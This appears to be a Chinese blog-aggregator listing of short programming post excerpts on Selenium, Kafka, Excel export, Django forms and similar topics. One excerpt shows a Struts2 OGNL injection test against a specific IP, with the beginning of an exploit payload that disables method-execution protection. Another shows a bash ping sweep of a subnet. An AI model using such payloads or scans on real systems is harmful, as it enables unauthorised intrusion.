#!/usr/bin/env python from selenium import webdriver from selenium.webdriver.common.action_chains import ActionChains import time class driver_class(o ...
分类:
编程语言 时间:
2020-04-16 22:39:48
阅读次数:
66
#!/bin/bash./etc/init.d/functionsforvarin{1..254};doip=31.0.140.$varping-c2$ip>/dev/null2>&1if[$?=0];thenaction"$ip"/bin/trueelseaction"$ip"/bin/falsefidone
分类:
系统相关 时间:
2020-04-16 22:36:31
阅读次数:
85
测试漏洞 http://219.153.49.228:45828/${1+2}.action 表达式进行了计算,表示漏洞存在,开始构造exp 读取当前文件夹的文件 ${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_me ...
分类:
其他好文 时间:
2020-04-16 15:34:26
阅读次数:
152
LeetCode上的卖股票题大概有6道,建议大家去看一下英文版 LeetCode上关于这类题目的讲解:https://leetcode.com/problems/best-time-to-buy-and-sell-stock-with-transaction-fee/discuss/108870/M ...
分类:
编程语言 时间:
2020-04-16 00:47:04
阅读次数:
88
Kafka基本命令 #启动server ./bin/kafka-server-start.sh config/server.properties #创建topic(主题)test ./bin/kafka-topics.sh --create --zookeeper localhost:2181 -- ...
分类:
其他好文 时间:
2020-04-15 21:33:48
阅读次数:
91
因近期项目遇到所以记录一下: 1、导出Excel 首先引用NPOI包 (NPOI自行搜索下载) (Action一定要用FileResult) 1 [Localization] 2 /// <summary> 3 /// 导出Table的数据 4 /// </summary> 5 /// <retur ...
分类:
Web程序 时间:
2020-04-15 16:31:40
阅读次数:
81
1.html代码 <form method="post" action="/xxx/" id="filter_all" > {% csrf_token %} <select name="filter_platform" id="filter_platform" style="height: 30px ...
分类:
其他好文 时间:
2020-04-15 11:11:23
阅读次数:
306
在平时开发中,经常需要实现这样的功能,拍照 - 裁剪,相册 - 裁剪。当然,系统也有裁剪的功能,但是由于机型,系统兼容性等问题,在实际开发当中,我们通常会自己进行实现。今天,就让我们一起来看看怎样实现。
分类:
微信 时间:
2020-04-15 10:56:11
阅读次数:
83
1.html代码 <form method="post" action="/xxxxx/" id="myform" onchange="submitForm_host_filter()"> {% csrf_token %} <input style="width: 250px;height: 30p ...
分类:
其他好文 时间:
2020-04-15 10:47:50
阅读次数:
72
一、鼠标操作 1.1鼠标的悬停操作,move_to_element from selenium import webdriver from selenium.webdriver.common.action_chains import ActionChains action=ActionChains( ...
分类:
Web程序 时间:
2020-04-14 20:37:21
阅读次数:
106